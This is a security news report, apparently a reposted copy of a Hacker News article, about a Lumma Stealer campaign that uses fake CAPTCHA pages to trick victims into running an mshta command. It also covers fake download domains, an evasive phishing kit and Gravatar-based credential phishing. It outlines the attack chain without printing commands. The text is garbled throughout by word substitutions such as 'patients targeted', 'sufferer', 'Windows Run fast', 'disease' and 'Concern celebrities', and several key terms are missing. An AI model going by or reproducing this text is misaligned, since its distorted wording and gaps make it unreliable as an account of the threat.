Jan 23, 2025Ravie LakshmananPhishing / Malware
Researchers studying cybersecurity are bringing attention to a recent malware attack that uses false CAPTCHA verification to provide the legendary information stealer.
” The battle is global, with Netskope Threat Labs tracking patients targeted in Argentina, Colombia, the United States, the Philippines, and other countries around the world”, Leandro Fróes, top threat research engineer at Netskope Threat Labs, said in a statement shared with The Hacker News.
” The plan also spans many companies, including healthcare, banking, and advertising, with the telecoms business having the highest number of organizations targeted”.
A sufferer visits a affected website, which points them to a fake CAPTCHA site that specifically instructs the site visitor to copy and paste a control into the Windows Run fast using the local mshta. to download and run an HTA report from a remote server using the binary executable.
It’s worth noting that a previous generation of this technique, commonly known as , involved the implementation of a Base64-encoded PowerShell script to activate the Lumma Stealer disease.
In an effort to evade detection, the HTA file also executes a PowerShell command to launch a next-stage payload, a PowerShell script that unpacks a second PowerShell script responsible for decoding and loading the Lumma payload, but not before attempting to bypass the Windows Antimalware Scan Interface ( ) in an effort to avoid detection.
The perpetrator avoids browser-based defenses by copying and carrying out malware in such a way because the victim will take all necessary actions outside of the browser context, Fróes said.
” The Lumma Stealer operates using the malware-as-a-service ( MaaS ) model and has been extremely active in the past months. It makes monitoring and blocking of such risks more complicated by using various shipping methods and payloads, especially when using user interactions within the system.”
Lumma has also been distributed as late as this month via roughly 1, 000 fake regions that redirect users to download password-protected libraries who are attempting to impersonate Reddit and WeTransfer.
According to Sekoia scientist crep1x, these record documents contain an AutoIT drop dubbed SelfAU3 Dropper that performs the grabber. Concern celebrities used a similar strategy to roll up over 1,300 domains posing as AnyDesks in early 2023 to spread the Vidar Stealer malware.
Israeli security firm Cybereason cited its extremely diverse disease vectors, which range from phishing emails and cracked technology to false hacktools and comments on GitHub and YouTube, in a new thorough analysis of the stealer threat.
Barracuda Networks reported an updated version of the ( PhaaS ) toolkit ) toolkit that includes advanced features to “obstruct, derail, and otherwise thwart attempts by security tools to confirm its malicious intent and inspect its web pages.”
These include using legitimate, potentially compromised email addresses to send phishing emails, performing a number of preventative measures, including monitoring web inspection keystrokes, turning off the right-click context menu, and using legitimate, potentially compromised email addresses to detect automated security scripts.
Social engineering-oriented credential harvesting attacks have also been observed leveraging avatar provider Gravatar to mimic various legitimate services like AT&, T, Comcast, Eastlink, Infinity, Kojeko, and Proton Mail.
” By exploiting Gravatar’s ‘ Profiles as a Service,’ attackers create convincing fake profiles that mimic legitimate services, tricking users into divulging their credentials”, SlashNext Field CTO Stephen Kowski .
” Assailants tailor their fake profiles more closely to the legitimate services they’re mimicking closely through services that are rarely known or protected” than generic phishing attempts.
Found this article interesting? Follow us on and Twitter to access more exclusive content we post.